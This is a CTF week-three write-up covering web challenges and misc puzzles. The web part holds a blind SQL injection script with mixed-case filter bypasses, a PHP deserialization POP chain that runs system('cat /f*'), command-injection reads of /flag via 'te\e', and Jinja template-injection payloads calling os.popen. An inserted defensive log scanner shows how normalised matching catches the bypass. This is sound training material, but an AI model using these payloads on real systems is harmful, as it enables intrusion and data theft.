NewStarCTF 2023 Week3 官方WriteUp (shimo.im)
web
Include 🍐
pearcmd file inclusion
medium_sql
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' %23
Normal response.
Fuzz it a bit:
order and union are banned, but many mixed-case variants are not.
if is not banned.
Try a boolean-based probe:
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1>0,1,0)%23 -> normal response
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1<0,1,0)%23 -> no output
So boolean-based blind injection works.
^ (XOR)
ascii
PoC
import requests
import time

i = 0
url = "http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/"
result = ""
for j in range(1, 10000):
    # binary search over the printable ASCII range for character j
    l = 32
    r = 128
    mid = (l + r) >> 1
    while l < r:
        # dump the database name
        # payload = "?id=TMP0919' And AScii(SUbstr(database(),{0},1))>{1}%23".format(j, mid)
        # dump the table names
        # payload = "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(TAble_NAme) FRom INFORmation_Schema.Tables WHere Table_Schema='ctf'),{0},1))>{1}%23".format(j, mid)
        # dump the column names
        # payload = "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(COLUmn_NAme) FRom INFORmation_Schema.COLUmns WHere TAble_NAme='here_is_flag'),{0},1))>{1}%23".format(j, mid)
        # dump the flag (uncomment one payload at a time)
        payload = "?id=TMP0919' And AScii(SUbstr((SElect flag FRom here_is_flag),{0},1))>{1}%23".format(j, mid)
        response = requests.get(url + payload)
        time.sleep(0.2)
        if "points" in response.text:  # page rendered normally: the condition was true
            l = mid + 1
            # print(payload)
            # print(response.text)
        else:
            r = mid
        mid = (l + r) >> 1
    if chr(mid) == " ":  # a space means the string has ended
        break
    result = result + chr(mid)
    i += 1
    print(i)
    print(result)
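As an added example that is not part of the original writeup, the following scan reproduces the filter weakness noted above (mixed-case keywords slipping past a banned-word list) from the defender's side: a case-sensitive blacklist, modelled on how the challenge's filter behaved, misses the AScii(SUbstr(...)) probes the script sends, while decoding and lowercasing each parameter before matching catches them. The log lines, the blacklist word list and the detection pattern are constructed for this example.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed access-log lines (not from the challenge target); the query
# strings reuse the payload shapes discussed in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:12:00:01 +0000] "GET /?id=TMP0919 HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2023:12:00:02 +0000] "GET /?id=TMP0919'%20order%20by%201%23 HTTP/1.1" 403 0
10.0.0.5 - - [01/Oct/2023:12:00:03 +0000] "GET /?id=TMP0919'%20And%20if(1>0,1,0)%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2023:12:00:04 +0000] "GET /?id=TMP0919'%20And%20AScii(SUbstr(database(),1,1))>80%23 HTTP/1.1" 200 512
"""

# Assumed model of the challenge's filter: exact lowercase words only,
# which is why the mixed-case payloads got through.
NAIVE_BLACKLIST = ("order", "union", "select", "ascii", "substr")

# Case-insensitive pattern applied after decoding and normalisation.
SQLI_PATTERN = re.compile(
    r"""(?ix)
    \b(?:union|select|order\s+by|ascii|substr|substring|group_concat|information_schema)\b
    | \bif\s*\(\s*\d+\s*[<>=]     # if(1>0,...) style boolean probes
    | '\s*(?:and|or)\b            # closing quote followed by a boolean operator
    """
)

def naive_filter_blocks(value: str) -> bool:
    """Case-sensitive blacklist, as the writeup observed the filter behaving."""
    return any(word in value for word in NAIVE_BLACKLIST)

def normalized_detects(value: str) -> bool:
    """Decode (twice, to cover double encoding), collapse whitespace, lowercase, then match."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = re.sub(r"\s+", " ", decoded).lower()
    return SQLI_PATTERN.search(decoded) is not None

REQ_RE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]"')

def scan_log(log_text: str):
    """Return (param, value, blocked_by_naive_filter, flagged_by_normalized) per parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlparse(m.group("path")).query, keep_blank_values=True)
        for name, values in params.items():
            for v in values:
                findings.append((name, v, naive_filter_blocks(v), normalized_detects(v)))
    return findings
```

Only the plain order by probe is caught by the naive list; the if() and mixed-case ascii/substr probes pass it but are flagged once the value is normalised.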
POP Gadget
Begin::__destruct->Then::__toString->Super::__invoke->Handle::__call->Ctf::end->whitegod::__unset
<?php
class Begin{
    public $name;
    public function __construct()
    {
        $this->name = new Then;
    }
}
class Then{
    private $func;
    public function __construct()
    {
        $this->func = new Super;
    }
}
class Handle{
    protected $obj;
    public function __construct()
    {
        $this->obj = new CTF;
    }
}
class Super{
    protected $obj;
    public function __construct()
    {
        $this->obj = new Handle;
    }
    public function end()
    {
        die("==GAME OVER==");
    }
}
class CTF{
    public $handle;
    public function __construct()
    {
        $this->handle = new WhiteGod;
    }
}
class WhiteGod{
    public $func;
    public $var;
    public function __construct()
    {
        $this->func = 'system';
        $this->var = 'cat /f*'; // readfile(/flag) works too
    }
}
echo urlencode(serialize(new Begin));
?>
No idea why ls / gives no response.
R!!!C!!!E!!!
echo is used to trigger the __toString method.
Since there is no output (exec returns nothing after running the command), try the tee command:
ls / | te\e 1
cat /flag_is_h3eeere | te\e 2
GenShin
Pass a parameter to name: ?secr3tofpop?name={{4*4}}
Filtered.
Pass ?secr3tofpop?name={%print(4*4)%}
?name={%print(''__class__)%}
Banned again. When this is banned, use get_flashed_messages or url_for (though I don't know what that is either).
?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read() )%}
url_for is banned.
?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read())%} is filtered.
Probably popen is being detected; try string concatenation to bypass it:
?name={%print(get_flashed_messages.__globals__.os['pop'+'en']("cat /flag").read())%}
Still filtered; it turned out later that the single quotes were being detected.
?name={%print(get_flashed_messages.__globals__.os["pop"+"en"]("cat /flag").read())%}
flag{0e66f27c-7114-4db2-b82f-817c22b2aeec}
misc
阳光开朗大男孩
Contents of secret:
法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由
Decoded: this_password_is_s000_h4rd_p4sssw0rdddd
Contents of flag:
🙃💵🌿🎤🚪🌏🐎🥋🚫😆😍🌊⏩🔬🚹✉☀☺🚹🐅🎤🛩💵🌿🌊🚰😊🌊✉🐎❓🎈🌉👑🎅📮🥋👣🕹🚪☀🔄🚫🐍❓🐍😊☀🔬🍍🤣🎈🥋🙃👑🌏🐎🌊📮😂💵🏹👉❓😇🍴💧☺💵😁☃👉🎅👁☂🌿👉🍴🌪👌🍴🍵🖐😇🍍😀🗒🗒
Searching online for emoji decoding turns up emoji-aes.
The key is the decoded contents of secret.
Never expected the key to actually be s000_h4rd_p4sssw0rdddd; no wonder it wouldn't decode.
flag{3m0ji_1s_s0000_1nt3rest1ng_0861aada1050}
大怨种
After splitting the gif into frames you get a 2D barcode; a web search shows it is a Han Xin Code.
The main problem is that QR scanners can't read it.
This website can scan it.
flag{1_d0nt_k0nw_h0w_to_sc4n_th1s_c0d3_acef808a868e}